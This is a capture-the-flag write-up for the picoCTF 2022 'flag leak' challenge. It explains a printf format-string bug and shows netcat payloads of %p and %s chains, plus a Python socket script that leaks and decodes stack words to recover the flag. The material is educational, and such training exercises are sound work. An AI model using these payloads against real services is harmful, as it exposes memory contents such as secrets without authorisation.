flag leak picoCTF 2022 Solution

Published: July 20, 2023

Description

The binary calls printf(user_input) directly instead of printf("%s", user_input). This format-string vulnerability allows you to read arbitrary data off the stack - including the flag stored as a local variable.

Connect via netcat. No binary download is required.

Send format-string specifiers to leak stack values and find the flag.

bash
nc saturn.picoctf.net <PORT_FROM_INSTANCE>
  1. Step 1: Understand the format-string vulnerability
    printf(user_input) interprets user input as a format string. %p reads pointer-sized values from the stack; %s dereferences a stack value as a string pointer.

    printf reads additional arguments from the stack (or registers on x86-64) based on format specifiers in its first argument. When user input IS the format string, the attacker controls which values get read.

    Common specifiers for leaking:

    • %p - print a pointer-sized value in hex. Safe; won't crash from invalid addresses.
    • %s - dereference the value as a char* and print as a string. Can crash if the value is not a valid pointer.
    • %x - print an unsigned int in hex. An int is 32 bits on both i386 and x86-64, so on a 64-bit target it shows only the low half of each slot.
    • %N$p - print the Nth argument directly (positional access; e.g., %3$p prints the third argument without consuming the first two).

    The flag is stored as a local variable (likely a char array on the stack) in the calling function. Its raw bytes can be read with a chain of %p specifiers. It can also be printed as a string with %s, but only if some stack slot holds a pointer to the buffer.
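The two leak styles above (a chain of plain %p versus positional %N$p) can be generated rather than typed by hand. The following is a minimal sketch; the helper names `sequential_payload` and `direct_payload` are made up for illustration and are not part of the challenge or of any library.

```python
def sequential_payload(count: int, sep: str = ".") -> str:
    """Chain of plain %p specifiers; each one consumes the next argument."""
    if count < 1:
        raise ValueError("count must be at least 1")
    return sep.join(["%p"] * count)


def direct_payload(first: int, last: int, sep: str = ".") -> str:
    """Chain of %N$p specifiers covering positions first..last inclusive."""
    if first < 1 or last < first:
        raise ValueError("positions are 1-based and first must not exceed last")
    return sep.join(f"%{n}$p" for n in range(first, last + 1))


if __name__ == "__main__":
    print(sequential_payload(3))   # %p.%p.%p
    print(direct_payload(17, 19))  # %17$p.%18$p.%19$p
```

The separator makes the output easy to split afterwards. Positional and plain specifiers should not be mixed in one format string, which is why the two builders are kept separate.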

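  2. Step 2: Leak the stack with %p chains
    This binary is 32-bit (i386), so every variadic argument is on the stack and %1$p already reads the first stack slot. On x86-64, by contrast, rdi holds the format string and rsi/rdx/rcx/r8/r9 carry the first five variadic arguments, so %6$p is the first stack-resident slot. Walking %1$p through %30$p is usually enough to cover the local-variable region; widen the range if the flag does not show up.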
    bash
    echo '%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p' | nc saturn.picoctf.net <PORT_FROM_INSTANCE>
    bash
    echo '%s' | nc saturn.picoctf.net <PORT_FROM_INSTANCE>

    How printf walks arguments on i386 (this binary). All variadic args sit on the stack starting at [esp+4] (the format string itself is at [esp]). Each %p consumes 4 bytes:

    vuln() at the printf(user_input) call:
      [esp+0x00] -> &user_input          <- the format string itself
      [esp+0x04] -> arg1   <- %p / %1$p
      [esp+0x08] -> arg2   <- %p / %2$p
      ...
      [esp+0x44] -> flag[0..3]  <- %17$p = 0x6f636970 ("pico")
      [esp+0x48] -> flag[4..7]  <- %18$p = 0x7b465443 ("CTF{")
      [esp+0x4c] -> flag[8..11] <- %19$p
      ...

    On x86-64, the first 5 variadic args after the format string come from rsi, rdx, rcx, r8, r9; from arg6 onward they live on the stack starting at [rsp]. So %6$p on x86-64 is the first stack-resident slot.
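The position-to-location arithmetic described above can be written down as a small lookup. This is a sketch of the rule as stated in this section, with offsets taken at the call site (before the call instruction pushes a return address). The function name `arg_location` is hypothetical.

```python
# rdi holds the format string, so the variadic arguments start at rsi.
X86_64_ARG_REGS = ("rsi", "rdx", "rcx", "r8", "r9")


def arg_location(n: int, arch: str) -> str:
    """Where printf finds the value for %n$p, relative to the call site."""
    if n < 1:
        raise ValueError("printf positions are 1-based")
    if arch == "i386":
        # Format string at [esp]; every argument is a 4-byte stack slot.
        return f"[esp+{4 * n:#04x}]"
    if arch == "x86-64":
        if n <= len(X86_64_ARG_REGS):
            return X86_64_ARG_REGS[n - 1]
        # Position 6 is the first 8-byte stack slot.
        return f"[rsp+{8 * (n - 6):#04x}]"
    raise ValueError(f"unsupported arch: {arch}")


if __name__ == "__main__":
    for pos in (1, 5, 6, 17):
        print(pos, arg_location(pos, "i386"), arg_location(pos, "x86-64"))
```

For example, `arg_location(17, "i386")` gives `[esp+0x44]`, while `arg_location(6, "x86-64")` gives `[rsp+0x00]`.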

    Decoding the leak (concrete worked example). Suppose your %p dump produces:

    %17$p = 0x6f636970   bytes 70 69 63 6f -> "pico"
    %18$p = 0x7b465443   bytes 43 54 46 7b -> "CTF{"
    %19$p = 0x6b34336c   bytes 6c 33 34 6b -> "l34k"
    %20$p = 0x676e1535   bytes 35 15 6e 67 -> "5\x15ng"  (garbled: 0x15 is not printable)

    Each 4-byte hex value reverses to a 4-character ASCII chunk (little-endian). Concatenating the chunks in order yields the flag, and the 0x7d byte (}) marks its end. If a chunk is partially garbled, retry with more %p specifiers or, if some slot holds a pointer to the flag buffer, use %N$s on that slot to print it as a string.
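The manual decoding in the worked example can be sketched in a few lines of Python. The helper names `decode_words` and `extract_flag` are made up for illustration. The code assumes 4-byte words as on this i386 target; pass `width=8` for a 64-bit leak. The second sample in the demo is invented only to show the closing brace being found.

```python
def decode_words(words, width=4):
    """Turn %p outputs (e.g. '0x6f636970') into bytes in memory order."""
    out = bytearray()
    for word in words:
        # glibc prints a null pointer as "(nil)" rather than 0x0.
        value = 0 if word == "(nil)" else int(word, 16)
        # Little-endian: the least significant byte sits at the lowest address.
        out += value.to_bytes(width, "little")
    return bytes(out)


def extract_flag(raw, prefix=b"picoCTF{"):
    """Return the text from prefix up to the first '}' (or to the end if absent)."""
    start = raw.find(prefix)
    if start < 0:
        return None
    end = raw.find(b"}", start)
    chunk = raw[start:] if end < 0 else raw[start:end + 1]
    return chunk.decode("latin-1")


if __name__ == "__main__":
    # First three words from the worked example above.
    print(decode_words(["0x6f636970", "0x7b465443", "0x6b34336c"]))
    # Invented sample that includes a closing brace.
    print(extract_flag(decode_words(["0x6f636970", "0x7b465443", "0x7d6b6f"])))
```

`int.to_bytes` raises `OverflowError` if a value does not fit in `width` bytes, which is a useful signal that the target is 64-bit rather than 32-bit.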

    Why %s is risky. %s dereferences the stack slot as a char*. If the slot is not a valid pointer, printf segfaults. Use %p first to identify slots whose values look like reasonable addresses (e.g., 0x080xxxxx in a 32-bit non-PIE binary), then switch to %s on those.
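The "use %p first, then %s" advice can be sketched as a filter over a leak. Everything here is an assumption for illustration. The address range mirrors the 0x080xxxxx example above and would need adjusting for the real memory map. The sample leak values are invented, and the names `pointer_candidates` and `string_payloads` are hypothetical.

```python
# Assumed range for a 32-bit non-PIE image (0x080xxxxx); adjust for the real target.
LIKELY_RANGES = [(0x08000000, 0x08100000)]


def pointer_candidates(leak, ranges=LIKELY_RANGES):
    """leak maps position -> %p output; return positions that look like pointers."""
    hits = []
    for pos in sorted(leak):
        text = leak[pos]
        if not text.startswith("0x"):
            continue  # "(nil)" or anything unparsable is never dereferenced
        value = int(text, 16)
        if any(lo <= value < hi for lo, hi in ranges):
            hits.append(pos)
    return hits


def string_payloads(positions):
    """One %N$s payload per candidate, so a crash only costs one attempt."""
    return [f"%{pos}$s" for pos in positions]


if __name__ == "__main__":
    sample = {1: "0x0804c000", 2: "0x6f636970", 3: "(nil)", 4: "0x080492b6"}
    print(string_payloads(pointer_candidates(sample)))  # ['%1$s', '%4$s']
```

Sending one %N$s per connection keeps a bad guess from taking the rest of the leak down with it. A value inside the range is still only a guess, not a guarantee that the address is mapped.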

  3. Step 3: Decode the leaked bytes to reconstruct the flag
    Each %p prints one 32-bit stack slot on this i386 binary (it would be 64 bits on x86-64). On a little-endian box, the low-address byte appears at the right of the hex; reverse the bytes to read ASCII left to right.
    python
    python3 - <<'EOF'
    import re
    import socket

    HOST = 'saturn.picoctf.net'
    PORT = 0  # replace 0 with PORT_FROM_INSTANCE

    s = socket.create_connection((HOST, PORT), timeout=5)
    banner = s.recv(1024)
    if not banner:
        raise RuntimeError('connection closed before banner')
    # The quoted heredoc stops the shell from expanding $p inside the payload.
    payload = '.'.join(f'%{i}$p' for i in range(1, 30)) + '\n'
    s.sendall(payload.encode())
    data = b''
    try:
        while chunk := s.recv(4096):  # read until the server closes the socket
            data += chunk
    except socket.timeout:
        pass  # keep whatever arrived before the timeout
    s.close()
    if not data:
        raise RuntimeError('no leak received - server closed')

    # Decode each leaked word; try little-endian first, fall back to big-endian.
    for val in re.findall(r'0x[0-9a-fA-F]+', data.decode('latin-1')):
        digits = val[2:]
        # Pad to at least 4 bytes and to an even number of hex digits.
        raw = bytes.fromhex(digits.zfill(max(8, len(digits) + len(digits) % 2)))
        le = raw[::-1].decode('latin-1')
        be = raw.decode('latin-1')
        score = lambda t: sum(c.isprintable() and not c.isspace() for c in t)
        pick = le if score(le) >= score(be) else be
        if score(pick):
            print(repr(pick))
    EOF

    A 32-bit value such as 0x6f636970 on a little-endian box stores its lowest byte first in memory, so the bytes in address order are 70 69 63 6f, which is ASCII pico. %p prints the most significant byte first, so the script reverses the byte order (not the individual hex digits) with raw[::-1] to recover the characters in source order. The same rule holds for 8-byte words on x86-64: 0x4654436f636970 is printed without its leading zero byte, and in memory it reads 70 69 63 6f 43 54 46 00, i.e. picoCTF followed by a NUL. The big-endian fallback only matters if the service runs on a big-endian (non-x86) host.

    The script sends %1$p through %29$p (range(1, 30) stops before 30). Position 1 is the first variadic argument, not the format string itself. On this i386 binary every position is a 4-byte stack slot; on x86-64, positions 1-5 would come from the System V argument registers (rsi/rdx/rcx/r8/r9) and position 6 onward from the stack. If the closing } does not appear in the output, widen the range. Higher positions reach into the caller's frame and beyond, where most decoded bytes are noise. If the service truncates long input, send the range in smaller batches.
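If the service reads input into a bounded buffer, a long %N$p chain may be cut off before the last positions. This section does not state whether this challenge has such a limit, so the 127-character figure below is a placeholder assumption. The helper `batched_payloads` is hypothetical and only sketches how a range could be split.

```python
def batched_payloads(first, last, max_len, sep="."):
    """Split positions first..last into %N$p chains no longer than max_len."""
    batches = []
    current = ""
    for n in range(first, last + 1):
        spec = f"%{n}$p"
        if len(spec) > max_len:
            raise ValueError("max_len is too small for a single specifier")
        candidate = spec if not current else current + sep + spec
        if len(candidate) > max_len:
            # The current chain is full; start a new one with this specifier.
            batches.append(current)
            current = spec
        else:
            current = candidate
    if current:
        batches.append(current)
    return batches


if __name__ == "__main__":
    # 127 is an assumed limit, not a documented one.
    for payload in batched_payloads(1, 29, 127):
        print(len(payload), payload)
```

Each batch would presumably need its own connection, since the program handles a single input per run.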

    Format-string bugs can also write to memory via %n, which stores the number of bytes printed so far at the address taken from the corresponding argument. For read-only leak challenges like this one, %p chains plus selective %s on slots that look like valid pointers are the entire toolkit. For the broader pattern set see Format string vulnerabilities for CTF and the script-driven workflow in pwntools for CTF.

Flag

picoCTF{L34k1ng_Fl4g_0ff_St4ck_...}

Send a chain of %p specifiers to dump stack values. Decode the hex output as little-endian ASCII to find the flag stored on the stack.
